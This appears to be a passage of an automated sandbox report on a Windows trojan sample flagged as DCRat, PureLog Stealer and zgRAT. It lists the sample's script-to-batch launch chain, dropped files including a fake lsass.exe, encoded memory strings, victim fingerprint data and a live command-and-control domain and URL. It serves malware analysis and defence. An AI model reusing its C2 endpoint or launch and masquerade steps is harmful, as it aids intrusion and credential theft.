Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597606	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597333	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597214	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594665	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 593938	Jump to behavior

Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4568447981.0000000012B43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4568447981.0000000012DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4569605763.000000001B41E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

API call chain: ExitProcess graph end node

graph_0-23638

Source: C:\webCrt\Surrogatedll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0023F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0023F838

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_00247DEE mov eax, dword ptr fs:[00000030h]

0_2_00247DEE

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0024C030 GetProcessHeap,

0_2_0024C030

Source: C:\webCrt\Surrogatedll.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0023F838
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023F9D5 SetUnhandledExceptionFilter,	0_2_0023F9D5
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0023FBCA
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00248EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00248EBD

Source: C:\webCrt\Surrogatedll.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webCrt\Surrogatedll.exe "C:\webCrt/Surrogatedll.exe"	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\EeMFgDHDyZvTl.exe "C:\Recovery\EeMFgDHDyZvTl.exe"	Jump to behavior

Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{},"5.0.1",5,1,"","user","936905","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States of America","New York / New York City"," / "]
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002E05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH1
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nknown)","Program Manager","8.46.123.228","US / United States of America","New York / New York City"," / "]
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0023F654 cpuid

0_2_0023F654

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0023AF0F

Source: C:\webCrt\Surrogatedll.exe	Queries volume information: C:\webCrt\Surrogatedll.exe VolumeInformation	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Queries volume information: C:\Recovery\EeMFgDHDyZvTl.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0023DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0023DF1E

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0022B146 GetVersionExW,

0_2_0022B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2205708195.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Surrogatedll.exe PID: 364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EeMFgDHDyZvTl.exe PID: 1088, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.0.Surrogatedll.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2105495821.000000000532A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2178061238.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Globalization\Time Zone\lsass.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\EeMFgDHDyZvTl.exe, type: DROPPED
Source: Yara match	File source: C:\webCrt\Surrogatedll.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.0.Surrogatedll.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Globalization\Time Zone\lsass.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\EeMFgDHDyZvTl.exe, type: DROPPED
Source: Yara match	File source: C:\webCrt\Surrogatedll.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2205708195.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Surrogatedll.exe PID: 364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EeMFgDHDyZvTl.exe PID: 1088, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.0.Surrogatedll.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2105495821.000000000532A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2178061238.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Globalization\Time Zone\lsass.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\EeMFgDHDyZvTl.exe, type: DROPPED
Source: Yara match	File source: C:\webCrt\Surrogatedll.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.0.Surrogatedll.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Globalization\Time Zone\lsass.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\EeMFgDHDyZvTl.exe, type: DROPPED
Source: Yara match	File source: C:\webCrt\Surrogatedll.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	2 Command and Scripting Interpreter	11 Scripting	12 Process Injection	131 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	136 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kqq1aAcVUQ.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
kqq1aAcVUQ.exe	52%	Virustotal		Browse
kqq1aAcVUQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\nukLNhSq.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Avira	HEUR/AGEN.1323342
C:\webCrt\gSYhm1mlqujwdrrg55.vbe	100%	Avira	VBS/Runner.VPG
C:\webCrt\Surrogatedll.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\hACmhobX.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\eMRvdFMJ.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\RyxhNllI.log	100%	Avira	TR/AVI.Agent.updqb
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Avira	HEUR/AGEN.1323342
C:\Windows\Globalization\Time Zone\lsass.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\nukLNhSq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\DWhAaqcM.log	100%	Joe Sandbox ML
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Joe Sandbox ML
C:\webCrt\Surrogatedll.exe	100%	Joe Sandbox ML
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\hACmhobX.log	100%	Joe Sandbox ML
C:\Recovery\EeMFgDHDyZvTl.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\IPdRdIgb.log	100%	Joe Sandbox ML
C:\Windows\Globalization\Time Zone\lsass.exe	100%	Joe Sandbox ML
C:\Recovery\EeMFgDHDyZvTl.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Pictures\EeMFgDHDyZvTl.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DWhAaqcM.log	8%	ReversingLabs
C:\Users\user\Desktop\IPdRdIgb.log	8%	ReversingLabs
C:\Users\user\Desktop\KCOiojdz.log	25%	ReversingLabs
C:\Users\user\Desktop\RyxhNllI.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eMRvdFMJ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\hACmhobX.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nukLNhSq.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\rrFUvAHK.log	25%	ReversingLabs
C:\Windows\Cursors\EeMFgDHDyZvTl.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Globalization\Time Zone\lsass.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\webCrt\EeMFgDHDyZvTl.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\webCrt\Surrogatedll.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
319351cm.nyashteam.ru	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://319351cm.nyashteam.ru/	100%	Avira URL Cloud	malware
http://319351cm.nyashteam.ru	100%	Avira URL Cloud	malware
http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php	100%	Avira URL Cloud	malware
http://319351cm.nyashtX	0%	Avira URL Cloud	safe
http://319351cm.nyashteam.ru	4%	Virustotal		Browse
http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
319351cm.nyashteam.ru	172.67.186.200	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://319351cm.nyashteam.ru/	EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://319351cm.nyashteam.ru	EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Surrogatedll.exe, 00000005.00000002.2202927639.0000000003E33000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://319351cm.nyashtX	EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.186.200	319351cm.nyashteam.ru	United States		13335	CLOUDFLARENETUS	true
104.21.2.8	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569655
Start date and time:	2024-12-06 03:11:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kqq1aAcVUQ.exe renamed because original name is a hash value
Original Sample Name:	6697A39548B61FCFCF800B206BDBD696.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@18/26@1/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EeMFgDHDyZvTl.exe, PID 1088 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:12:18	API Interceptor	12210598x Sleep call for process: EeMFgDHDyZvTl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.186.200	WjikmGPcSC.exe	Get hash	malicious	DCRat	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://es.ineffable9.com/7GbZu6Idv_m2at7xgNmWkk/	Get hash	malicious	Unknown	Browse	172.67.182.170
